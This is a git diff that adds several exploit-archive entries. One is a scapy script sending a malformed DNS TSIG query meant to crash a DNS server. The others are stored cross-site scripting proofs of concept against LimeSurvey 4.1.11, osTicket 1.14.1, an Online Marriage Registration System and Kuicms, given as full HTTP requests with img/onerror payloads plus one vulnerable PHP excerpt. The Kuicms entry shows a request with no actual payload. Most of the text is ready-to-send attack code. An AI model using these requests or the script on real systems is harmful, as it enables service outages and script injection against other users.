diff --git a/exploits/multiple/dos/48521.py b/exploits/multiple/dos/48521.py
new file mode 100755
index 000000000..701bdec9c
--- /dev/null
+++ b/exploits/multiple/dos/48521.py
@@ -0,0 +1,11 @@
+#!/usr/bin/python
+#coding:utf-8
+
+from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT
+
+tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="", time_signed=0, fudge=300, error=16)
+
+dns_req = IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig)
+answer = sr1(dns_req, verbose=0)
+
+print(answer[DNS].summary())
\ No newline at end of file
diff --git a/exploits/php/webapps/48522.txt b/exploits/php/webapps/48522.txt
new file mode 100644
index 000000000..8f81b924e
--- /dev/null
+++ b/exploits/php/webapps/48522.txt
@@ -0,0 +1,72 @@
+Exploit Title: Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-05-26
+# Exploit Author: that faceless coder(Inveteck Global)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: Online Marriage Registration System 1.0 - Stored Cross-Site Scripting
+# Tested on: MAC OS MOJAVE v 10.14.6
+# CVE : N/A
+
+The Online Marriage Registration System suffers from multiple stored cross-site script vulnerabilities:
+
+if(isset($_POST['submit']))
+ {
+
+$nofhusband=$_POST['nofhusband'];
+$hreligion=$_POST['hreligion'];
+$haddress=$_POST['haddress'];
+$hstate=$_POST['hstate'];
+
+$nofwife=$_POST['nofwife'];
+$wreligion=$_POST['wreligion'];
+$waddress=$_POST['waddress'];
+$wstate=$_POST['wstate'];
+$witnessnamef=$_POST['witnessnamef'];
+$waddressfirst=$_POST['waddressfirst'];
+$witnessnames=$_POST['witnessnames'];
+$waddresssec=$_POST['waddresssec'];
+$witnessnamet=$_POST['witnessnamet'];
+$waddressthird=$_POST['waddressthird'];
+
+$sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)";
+$query=$dbh->prepare($sql);
+
+$sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)";
+$query=$dbh->prepare($sql);
+$query->bindParam(':nofhusband',$nofhusband,PDO::PARAM_STR);
+$query->bindParam(':hreligion',$hreligion,PDO::PARAM_STR);
+$query->bindParam(':hdob',$hdob,PDO::PARAM_STR);
+$query->bindParam(':hsbmarriage',$hsbmarriage,PDO::PARAM_STR);
+$query->bindParam(':haddress',$haddress,PDO::PARAM_STR);
+$query->bindParam(':hzipcode',$hzipcode,PDO::PARAM_STR);
+$query->bindParam(':hstate',$hstate,PDO::PARAM_STR);
+$query->bindParam(':hadharno',$hadharno,PDO::PARAM_STR);
+$query->bindParam(':nofwife',$nofwife,PDO::PARAM_STR);
+$query->bindParam(':wifeimg',$wifeimg,PDO::PARAM_STR);
+$query->bindParam(':wreligion',$wreligion,PDO::PARAM_STR);
+$query->bindParam(':wdob',$wdob,PDO::PARAM_STR);
+$query->bindParam(':wsbmarriage',$wsbmarriage,PDO::PARAM_STR);
+$query->bindParam(':waddress',$waddress,PDO::PARAM_STR);
+$query->bindParam(':wzipcode',$wzipcode,PDO::PARAM_STR);
+$query->bindParam(':wstate',$wstate,PDO::PARAM_STR);
+$query->bindParam(':wadharno',$wadharno,PDO::PARAM_STR);
+$query->bindParam(':witnessnamef',$witnessnamef,PDO::PARAM_STR);
+$query->bindParam(':waddressfirst',$waddressfirst,PDO::PARAM_STR);
+$query->bindParam(':witnessnames',$witnessnames,PDO::PARAM_STR);
+$query->bindParam(':waddresssec',$waddresssec,PDO::PARAM_STR);
+$query->bindParam(':witnessnamet',$witnessnamet,PDO::PARAM_STR);
+$query->bindParam(':waddressthird',$waddressthird,PDO::PARAM_STR);
+ $query->execute();
+
+ $LastInsertId=$dbh->lastInsertId();
+ if ($LastInsertId>0) {
+
+echo '';
+ }
+ else
+ {
+ echo '';
+ }
+
+The data gets stored through the mentioned vulnerable parameters into the database. There is no filtering when those values are printed when the web application fetches the data from the database
\ No newline at end of file
diff --git a/exploits/php/webapps/48523.txt b/exploits/php/webapps/48523.txt
new file mode 100644
index 000000000..3df5aabc6
--- /dev/null
+++ b/exploits/php/webapps/48523.txt
@@ -0,0 +1,33 @@
+# Exploit Title: LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting
+# Date: 05/26/2020
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.limesurvey.org
+# Version: LimeSurvey 4.1.11+200316
+# Tested on: Ubuntu 18.04.4
+# Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/2aada33c76efbbc35d33c149ac02b1dc16a81f62
+
+
+# Vulnerability Details
+Description : A stored cross-site scripting vulnerability exists within the "Permission Roles" functionality of the LimeSurvey administration panel.
+Vulnerable Parameters : Permissiontemplates[name], Permissiontemplates[description]
+
+
+# POC
+# Exploit Details : The following request will create a permission role with an XSS payload as the role name and description.
+
+
+POST /limesurvey/index.php/admin/roles/sa/applyedit HTTP/1.1
+Host: TARGET
+Content-Length: 443
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://TARGET
+Referer: http://TARGET/limesurvey/index.php/admin/roles
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: YII_CSRF_TOKEN=RWc3emx-NVhlfm1xamJhRkVSWGlkc1lRfmR5U0RRalYzu7h7NfgUoNTY6kMmTkPkB3J0_IsbOQQEMfsWGmt0Pg%3D%3D; LS-ERXSBPYJOOGIGFYW=m4qshhf7m76ifsm6k0v1vq084h
+Connection: close
+
+YII_CSRF_TOKEN=RWc3emx-NVhlfm1xamJhRkVSWGlkc1lRfmR5U0RRalYzu7h7NfgUoNTY6kMmTkPkB3J0_IsbOQQEMfsWGmt0Pg%3D%3D&Permissiontemplates%5Bptid%5D=&Permissiontemplates%5Bname%5D=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&Permissiontemplates%5Bdescription%5D=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&Permissiontemplates%5Brenewed_last%5D=2020-03-31+17%3A51%3A02&Permissiontemplates%5Bcreated_at%5D=2020-03-31+17%3A51%3A02&Permissiontemplates%5Bcreated_by%5D=1
\ No newline at end of file
diff --git a/exploits/php/webapps/48524.txt b/exploits/php/webapps/48524.txt
new file mode 100644
index 000000000..e4bcc4984
--- /dev/null
+++ b/exploits/php/webapps/48524.txt
@@ -0,0 +1,34 @@
+# Exploit Title: osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting
+# Date: 2020-05-26
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://osticket.com
+# Patch Link: https://github.com/osTicket/osTicket/commit/6c724ea3fe352d10d457d334dc054ef81917fde1
+# Version: osTicket 1.14.1
+# Tested on: CentOS 7 (1908)
+
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists within the 'Ticket Queue' functionality of osTicket.
+# Vulnerable Parameter : queue-name
+
+
+# POC
+# Exploit Details : The following request will create a ticket queue with an XSS payload as the queue name.
+
+
+POST /os-ticket/scp/queues.php? HTTP/1.1
+Host: TARGET
+Content-Length: 4491
+Cache-Control: max-age=0
+Origin: http://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://TARGET/os-ticket/scp/queues.php?
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: OSTSESSID=0c1ssokv9npgmlolue4utj3l81
+Connection: close
+
+__CSRFToken__=849ba29024f9d9a894b82fafe29437ace2edc4fa&do=create&a=add&id=&queue-name=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&parent_id=0&fields%5B%5D=status__id&fields%5B%5D=status__state&fields%5B%5D=dept_id&fields%5B%5D=assignee&fields%5B%5D=topic_id&fields%5B%5D=created&fields%5B%5D=est_duedate&fields%5B%5D=duedate&250f895b1cb39a=&_field-checkboxes%5B%5D=1545030345&21128ea1697b9a%5B%5D=includes&c88a27abe7cfab%5B%5D=1&8c6a793c80594e%5B%5D=includes&27ca5f383385cb%5B%5D=includes&82094a76afc304%5B%5D=assigned&85d9edefffa2af%5B%5D=set&a504e6f17eb29c%5B%5D=set&0cc4d080a6f9c7=&3bf29b1e29f88a=&cdf4550c8c6152=&6fd24fee5b5572=&fc1676be53debd=&8097e50092c904=&6691443ad8db48%5B%5D=&a34b4283149a9c=&14e270255589aa%5B%5D=d&f5c5cacb5af509=&197e4e922ff97d%5B%5D=d&046798c3e2934b=&35fedfb3380450%5B%5D=d&0358d35fd35b18=&6e8cc954821ab8%5B%5D=d&e8d808c9daa716%5B%5D=set&ba9c3701fead0c=&d5eed7d2b6f6d6=&42861e6193e58b=&5c39f4b522d7bc=&2008591c98253e=&d37db1b3627ff7=&24fb32de6f1bb7%5B%5D=&6759a92723004c=&bad7322c569428%5B%5D=d&ed195f6bb72ac4=&dded6ab7ae5f7d%5B%5D=d&2f075fa6f1d982=&608f0a963cf3ee%5B%5D=d&1a29ab5444d543=&df9d61f18b866b%5B%5D=d&d72deaa7c372fc%5B%5D=set&76bf3342e88075=&7a259ed4ddda1b=&bb46d89a671337=&4a459564d07f4d=&8f724bccb10aa8=&cb91e9d8492749=&5b783534587f6a%5B%5D=&68dc79a3890bef=&1f25af8e5603df%5B%5D=d&28959e91fd9838=&204683549219a5%5B%5D=d&0a68d064cd567a=&d4b3a0b1aea1b8%5B%5D=d&90c9e78164a9d4=&e4b53638ab9b55%5B%5D=d&new-field=&filter=&sort_id=&columns%5B1%5D%5Bcolumn_id%5D=1&columns%5B1%5D%5Bheading%5D=Number&columns%5B1%5D%5Bwidth%5D=85&columns%5B1%5D%5Bsortable%5D=on&columns%5B2%5D%5Bcolumn_id%5D=2&columns%5B2%5D%5Bheading%5D=Created&columns%5B2%5D%5Bwidth%5D=120&columns%5B2%5D%5Bsortable%5D=on&columns%5B3%5D%5Bcolumn_id%5D=3&columns%5B3%5D%5Bheading%5D=Subject&columns%5B3%5D%5Bwidth%5D=250&columns%5B3%5D%5Bsortable%5D=on&columns%5B4%5D%5Bcolumn_id%5D=4&columns%5B4%5D%5Bheading%5D=From&columns%5B4%5D%5Bwidth%5D=150&columns%5B4%5D%5Bsortable%5D=on&columns%5B5%5D%5Bcolumn_id%5D=5&columns%5B5%5D%5Bheading%5D=Priority&columns%5B5%5D%5Bwidth%5D=120&columns%5B5%5D%5Bsortable%5D=on&columns%5B8%5D%5Bcolumn_id%5D=8&columns%5B8%5D%5Bheading%5D=Assignee&columns%5B8%5D%5Bwidth%5D=100&columns%5B8%5D%5Bsortable%5D=on&exports%5Bnumber%5D%5Bname%5D=Ticket+Number&exports%5Bnumber%5D%5Bheading%5D=Ticket+Number&exports%5Bcreated%5D%5Bname%5D=Date+Created&exports%5Bcreated%5D%5Bheading%5D=Date+Created&exports%5Bcdata__subject%5D%5Bname%5D=Subject&exports%5Bcdata__subject%5D%5Bheading%5D=Subject&exports%5Buser__name%5D%5Bname%5D=From&exports%5Buser__name%5D%5Bheading%5D=From&exports%5Buser__emails__address%5D%5Bname%5D=From+Email&exports%5Buser__emails__address%5D%5Bheading%5D=From+Email&exports%5Bcdata__priority%5D%5Bname%5D=Priority&exports%5Bcdata__priority%5D%5Bheading%5D=Priority&exports%5Bdept_id%5D%5Bname%5D=Department&exports%5Bdept_id%5D%5Bheading%5D=Department&exports%5Btopic_id%5D%5Bname%5D=Help+Topic&exports%5Btopic_id%5D%5Bheading%5D=Help+Topic&exports%5Bsource%5D%5Bname%5D=Source&exports%5Bsource%5D%5Bheading%5D=Source&exports%5Bstatus__id%5D%5Bname%5D=Current+Status&exports%5Bstatus__id%5D%5Bheading%5D=Current+Status&exports%5Blastupdate%5D%5Bname%5D=Last+Updated&exports%5Blastupdate%5D%5Bheading%5D=Last+Updated&exports%5Best_duedate%5D%5Bname%5D=SLA+Due+Date&exports%5Best_duedate%5D%5Bheading%5D=SLA+Due+Date&exports%5Bduedate%5D%5Bname%5D=Due+Date&exports%5Bduedate%5D%5Bheading%5D=Due+Date&exports%5Bclosed%5D%5Bname%5D=Closed+Date&exports%5Bclosed%5D%5Bheading%5D=Closed+Date&exports%5Bisoverdue%5D%5Bname%5D=Overdue&exports%5Bisoverdue%5D%5Bheading%5D=Overdue&exports%5Bmerged%5D%5Bname%5D=Merged&exports%5Bmerged%5D%5Bheading%5D=Merged&exports%5Blinked%5D%5Bname%5D=Linked&exports%5Blinked%5D%5Bheading%5D=Linked&exports%5Bisanswered%5D%5Bname%5D=Answered&exports%5Bisanswered%5D%5Bheading%5D=Answered&exports%5Bstaff_id%5D%5Bname%5D=Agent+Assigned&exports%5Bstaff_id%5D%5Bheading%5D=Agent+Assigned&exports%5Bteam_id%5D%5Bname%5D=Team+Assigned&exports%5Bteam_id%5D%5Bheading%5D=Team+Assigned&exports%5Bthread_count%5D%5Bname%5D=Thread+Count&exports%5Bthread_count%5D%5Bheading%5D=Thread+Count&exports%5Breopen_count%5D%5Bname%5D=Reopen+Count&exports%5Breopen_count%5D%5Bheading%5D=Reopen+Count&exports%5Battachment_count%5D%5Bname%5D=Attachment+Count&exports%5Battachment_count%5D%5Bheading%5D=Attachment+Count&exports%5Btask_count%5D%5Bname%5D=Task+Count&exports%5Btask_count%5D%5Bheading%5D=Task+Count&new-field=&submit=Create
\ No newline at end of file
diff --git a/exploits/php/webapps/48525.txt b/exploits/php/webapps/48525.txt
new file mode 100644
index 000000000..7296d11b7
--- /dev/null
+++ b/exploits/php/webapps/48525.txt
@@ -0,0 +1,34 @@
+# Exploit Title: osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting
+# Date: 2020-06-26
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://osticket.com
+# Patch Link: https://github.com/osTicket/osTicket/commit/d54cca0b265128f119b6c398575175cb10cf1754
+# Version: osTicket 1.14.1
+# Tested on: CentOS 7 (1908)
+
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists within the 'Saved Searches' functionality of osTicket.
+# Vulnerable Parameter : queue-name
+
+
+# POC
+# Exploit Details : The following request will create a personal queue with an XSS payload as the queue name.
+
+
+POST /os-ticket/scp/ajax.php/tickets/search/save HTTP/1.1
+Host: TARGET
+Content-Length: 2407
+Accept: */*
+X-CSRFToken: 4c0cfe1d90018bd1521d4c6236ff9e695695feb4
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://TARGET
+Referer: http://TARGET/os-ticket/scp/tickets.php?queue=1
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: OSTSESSID=1bgg4patkgh75amtk7i40ijg0r
+Connection: close
+
+id=&parent_id=1&a=search&fields%5B%5D=status__id&fields%5B%5D=status__state&fields%5B%5D=dept_id&fields%5B%5D=assignee&fields%5B%5D=topic_id&fields%5B%5D=created&fields%5B%5D=est_duedate&fields%5B%5D=duedate&6e726d7c5d6739=&bb1ed81f8d0d5b%5B%5D=includes&_field-checkboxes%5B%5D=1248906005&5a14e85b6ad733%5B%5D=includes&64e882412ea044%5B%5D=open&3387e761db951b%5B%5D=includes&fae2c0ad94312b%5B%5D=assigned&8b25367208a92c%5B%5D=set&4548de579d61b2%5B%5D=set&6b0942ccd352fb=&7508c012d200c3=&306afd69a94f37=&2cb42ece11fe18=&19178654ae1019=&5446ab541e9cbe=&643b959c89a939%5B%5D=&c41f997e500bde=&594ae09ae9b23b%5B%5D=d&f67d51537548ed=&782f1a2f64f6b8%5B%5D=d&bf54f7c4c9cd85=&d53f6d5fa7c165%5B%5D=d&dda4c3a3983e11=&3edd5b8c560cb0%5B%5D=d&5d54602e649846%5B%5D=set&eee448b2f6bd17=&c66cc8358c9461=&1c2df7cbee73a8=&2b12655056e4bc=&559ec54e5d4f4d=&4d653aa4c6fbfe=&fde625f821b1cc%5B%5D=&1d3ec7f5059a1e=&fd5c9e3beeb866%5B%5D=d&f9d70eb7b32ef7=&4e236864d83b1b%5B%5D=d&6ad52c19a211f8=&17d6ed14edc097%5B%5D=d&1ed604fc8adb80=&29187a3432e23b%5B%5D=d&6a2107ce7bc3ad%5B%5D=set&968398f30ae34d=&1bd5961978d6f5=&aaead453b69fd8=&b2473437455577=&2d7ade2446d29d=&7248fe732f4071=&9d29b71605e863%5B%5D=&606b27533da5da=&042dae34bbf5f6%5B%5D=d&69e461f3457905=&9cb82bf3b3b655%5B%5D=d&472a67a44bfd63=&387c6a57919904%5B%5D=d&b13a3742f14f6a=&285dc00ac07d30%5B%5D=d&new-field=&inherit-columns=on&columns%5B1%5D%5Bcolumn_id%5D=1&columns%5B1%5D%5Bheading%5D=Ticket&columns%5B1%5D%5Bwidth%5D=100&columns%5B1%5D%5Bname%5D=Ticket+%23&columns%5B1%5D%5Bsortable%5D=on&columns%5B10%5D%5Bcolumn_id%5D=10&columns%5B10%5D%5Bheading%5D=Last+Updated&columns%5B10%5D%5Bwidth%5D=150&columns%5B10%5D%5Bname%5D=Last+Updated&columns%5B10%5D%5Bsortable%5D=on&columns%5B3%5D%5Bcolumn_id%5D=3&columns%5B3%5D%5Bheading%5D=Subject&columns%5B3%5D%5Bwidth%5D=300&columns%5B3%5D%5Bname%5D=Subject&columns%5B3%5D%5Bsortable%5D=on&columns%5B4%5D%5Bcolumn_id%5D=4&columns%5B4%5D%5Bheading%5D=From&columns%5B4%5D%5Bwidth%5D=185&columns%5B4%5D%5Bname%5D=User+Name&columns%5B4%5D%5Bsortable%5D=on&columns%5B5%5D%5Bcolumn_id%5D=5&columns%5B5%5D%5Bheading%5D=Priority&columns%5B5%5D%5Bwidth%5D=85&columns%5B5%5D%5Bname%5D=Priority&columns%5B5%5D%5Bsortable%5D=on&columns%5B8%5D%5Bcolumn_id%5D=8&columns%5B8%5D%5Bheading%5D=Assigned+To&columns%5B8%5D%5Bwidth%5D=160&columns%5B8%5D%5Bname%5D=Assignee&columns%5B8%5D%5Bsortable%5D=on&queue-name=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E
\ No newline at end of file
diff --git a/exploits/php/webapps/48526.txt b/exploits/php/webapps/48526.txt
new file mode 100644
index 000000000..8234718d9
--- /dev/null
+++ b/exploits/php/webapps/48526.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Kuicms Php EE 2.0 - Persistent Cross-Site Scripting
+# Date: 2020-05-27
+# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
+# Vendor Homepage: https://kuicms.com
+# Software Link: https://kuicms.com/kuicms.zip
+# Version: Kuicms Php EE 2.0
+# Tested on: Windows
+# CVE : N/A
+
+Vulnerable Request:
+POST /web/?c=bbs&a=reply&id=1 HTTP/1.1
+Host: 172.16.166.137
+Content-Length: 56
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://172.16.166.137
+Referer: http://172.16.166.137/web/?m=bbsshow&id=1
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=vpj3jduhoqlfieqhcnlilck2s6
+Connection: close
+
+content=test